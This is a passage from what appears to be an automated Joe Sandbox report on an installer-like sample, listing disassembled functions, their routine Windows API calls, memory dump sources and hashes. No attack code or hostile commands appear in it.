                                                                              • Part of subcall function 00495584: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049559D
                                                                            • SetErrorMode.KERNEL32(00000001,00000000,0049863C), ref: 0049860E
                                                                              • Part of subcall function 00498338: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498618,00000001,00000000,0049863C), ref: 00498342
                                                                              • Part of subcall function 00498338: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498348
                                                                              • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                            • ShowWindow.USER32(?,00000005,00000000,0049863C), ref: 0049866F
                                                                              • Part of subcall function 00482050: SetActiveWindow.USER32(?), ref: 004820FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                            • String ID: Setup
                                                                            • API String ID: 504348408-3839654196
                                                                            • Opcode ID: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                            • Instruction ID: d131c851e578025af209eb9e9c2d0e6aaf1cfb04eb4cc82699b843ce611002a7
                                                                            • Opcode Fuzzy Hash: 0b193bc7ab6d0367c14efa4071f6efbf19235d44a4c70119fe87f529ba434d3c
                                                                            • Instruction Fuzzy Hash: 5C31D4702046409ED601BBBBED5352E3B98EB8A718B61487FF804D6553CE3D6C148A3E
                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A56
                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453AFF,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: .tmp
                                                                            • API String ID: 1375471231-2986845003
                                                                            • Opcode ID: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                            • Instruction ID: fcbeb811eea92760dd82faa40bdacdd366465f8a5342b7af386d3ee3900427bd
                                                                            • Opcode Fuzzy Hash: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                            • Instruction Fuzzy Hash: 5A213375A00208ABDB01EFA1C8429DEB7B9EB48305F50457BE801B7342DA789F058AA5
                                                                            APIs
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C596,00000000,0047C5AC,?,?,?,?,00000000), ref: 0047C372
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID: RegisteredOrganization$RegisteredOwner
                                                                            • API String ID: 3535843008-1113070880
                                                                            • Opcode ID: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                            • Instruction ID: cd6b81515cbcb541a42d20c803a6709c30f964b406f28b15d8fe69fce277d2ff
                                                                            • Opcode Fuzzy Hash: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                            • Instruction Fuzzy Hash: 41F09030704204ABEB00D669ECD2BAA33A99746304F60C03FA9088B392D6799E01CB5C
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754E1
                                                                            • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754F8
                                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateErrorFileHandleLast
                                                                            • String ID: CreateFile
                                                                            • API String ID: 2528220319-823142352
                                                                            • Opcode ID: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                            • Instruction ID: 40e201e46ebb19b1d9bf90fbf766f72b309683208074062896c4944ddf319cda
                                                                            • Opcode Fuzzy Hash: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                            • Instruction Fuzzy Hash: CDE065702403447FDA10F769CCC6F4577889B14729F10C155B5446F3D2C5B9EC408628
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID: System\CurrentControlSet\Control\Windows$c6H
                                                                            • API String ID: 71445658-1548894351
                                                                            • Opcode ID: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                            • Instruction ID: b14c86e398362f8621ba381b59967aff518ca924b2daa5b46ce173f8349262a2
                                                                            • Opcode Fuzzy Hash: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                            • Instruction Fuzzy Hash: BFD0C772950128BBDB00DA89DC41DFB775DDB15760F45441BFD049B141C1B4EC5197F8
                                                                            APIs
                                                                              • Part of subcall function 00456E7C: CoInitialize.OLE32(00000000), ref: 00456E82
                                                                              • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                              • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                            • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                            • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                            • API String ID: 2906209438-2320870614
                                                                            • Opcode ID: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                            • Instruction ID: 6d1f0b9ea2f83cf17b9d56af39d37ffc4890966232cc80b75afa5f9be50b51f8
                                                                            • Opcode Fuzzy Hash: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                            • Instruction Fuzzy Hash: 97C04CA1B4169096CB00B7FAA54361F2414DB5075FB96C07FBD40BB687CE7D8848AA2E
                                                                            APIs
                                                                              • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                              • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                            • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressErrorLibraryLoadModeProc
                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                            • API String ID: 2492108670-2683653824
                                                                            • Opcode ID: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                            • Instruction ID: 608de25eae135e4754017d8cf95b07e3007941af04aa8fd5541e4ba3120ba520
                                                                            • Opcode Fuzzy Hash: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                            • Instruction Fuzzy Hash: 69B092E0F056008ACF00A7F6984260A10059B8071DF90807B7440BB395EA3E840AAB6F
                                                                            APIs
                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448719), ref: 0044865C
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID:
                                                                            • API String ID: 2574300362-0
                                                                            • Opcode ID: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                            • Instruction ID: bcb50df029510264ac3c8269deb9aca16d778d72fab4f9fb4f479d94b6d7f3fe
                                                                            • Opcode Fuzzy Hash: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                            • Instruction Fuzzy Hash: 09514170A00105AFDB40EFA5C491A9EBBF9EB54315F11817EA414BB392DA389E05CB99
                                                                            APIs
                                                                            • GetSystemMenu.USER32(00000000,00000000,00000000,0048183C), ref: 004817D4
                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004817E5
                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004817FD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Append$System
                                                                            • String ID:
                                                                            • API String ID: 1489644407-0
                                                                            • Opcode ID: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                            • Instruction ID: b36482c1273671328963914ac1a7ecaae55131090c894365c145815d0470a156
                                                                            • Opcode Fuzzy Hash: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                            • Instruction Fuzzy Hash: 02318E307043445AD721FB359D82BAE3A989B15318F54593FB900AA3E3CA7C9C4A87AD
                                                                            APIs
                                                                            • 755A1520.VERSION(00000000,?,?,?,004972D0), ref: 0045251C
                                                                            • 755A1500.VERSION(00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452549
                                                                            • 755A1540.VERSION(?,004525C0,?,?,00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452563
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: A1500A1520A1540
                                                                            • String ID:
                                                                            • API String ID: 2563864905-0
                                                                            • Opcode ID: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                            • Instruction ID: b47a7e64509d5cca070909842564d4f4e78a1d1ae8fea26b0cdd83eea50adb12
                                                                            • Opcode Fuzzy Hash: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                            • Instruction Fuzzy Hash: 6B218371A00148AFDB01DAA989519AFB7FCEB4A300F55447BFC00E3342E6B99E04CB65
                                                                            APIs
                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                            • TranslateMessage.USER32(?), ref: 0042449F
                                                                            • DispatchMessageA.USER32(?), ref: 004244A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Message$DispatchPeekTranslate
                                                                            • String ID:
                                                                            • API String ID: 4217535847-0
                                                                            • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                            • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                            • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                            • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                            APIs
                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                            • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Prop$Window
                                                                            • String ID:
                                                                            • API String ID: 3363284559-0
                                                                            • Opcode ID: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                            • Instruction ID: 2262f6f032fbfc8c948eb6af5e1566575da4c35a9ecfa624f63ddadf83d7b404
                                                                            • Opcode Fuzzy Hash: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                            • Instruction Fuzzy Hash: E3F0B271701210ABD710AB599C85FA632DCAB09719F160176BD09EF286C778DC40C7A8
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                            • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                            • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableEnabledVisible
                                                                            • String ID:
                                                                            • API String ID: 3234591441-0
                                                                            • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                            • Instruction ID: eab114e884733e02e348d5fb54c1eeaedaab2d2a8f53f62e6f3f1b5b82b3488b
                                                                            • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                            • Instruction Fuzzy Hash: 90E0EDB9100300AAE711AB2BEC81A57769CBB94314F45843BAC099B293DA3EDC409B78
                                                                            APIs
                                                                            • SetActiveWindow.USER32(?), ref: 0046A378
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ActiveWindow
                                                                            • String ID: PrepareToInstall
                                                                            • API String ID: 2558294473-1101760603
                                                                            • Opcode ID: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                            • Instruction ID: 163d609461ff3b9580316b21a780dec1cd9204125e937a74b025edb926540d27
                                                                            • Opcode Fuzzy Hash: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                            • Instruction Fuzzy Hash: 90A10A34A00109DFCB00EB99D985EEEB7F5AF88304F1580B6E404AB362D738AE45DF59
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /:*?"<>|
                                                                            • API String ID: 0-4078764451
                                                                            • Opcode ID: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                            • Instruction ID: b706238f5af82f8a54f925a22e06db4ee79b372672e861a4edd763b161806009
                                                                            • Opcode Fuzzy Hash: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                            • Instruction Fuzzy Hash: 6F7197B0B44244AADB20E766DCC2BEE77A19F41704F108167F5807B392E7B99D45878E
                                                                            APIs
                                                                            • SetActiveWindow.USER32(?), ref: 004820FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ActiveWindow
                                                                            • String ID: InitializeWizard
                                                                            • API String ID: 2558294473-2356795471
                                                                            • Opcode ID: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                            • Instruction ID: b8891c381381d1a0014b65a4ce29d1dfbbdf9d421e77ac889de6892087eb3363
                                                                            • Opcode Fuzzy Hash: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                            • Instruction Fuzzy Hash: BE118234205204DFD711EBA5FE96B2977E4EB55314F20143BE5008B3A1DA796C50CB6D
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C472,00000000,0047C5AC), ref: 0047C271
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C241
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
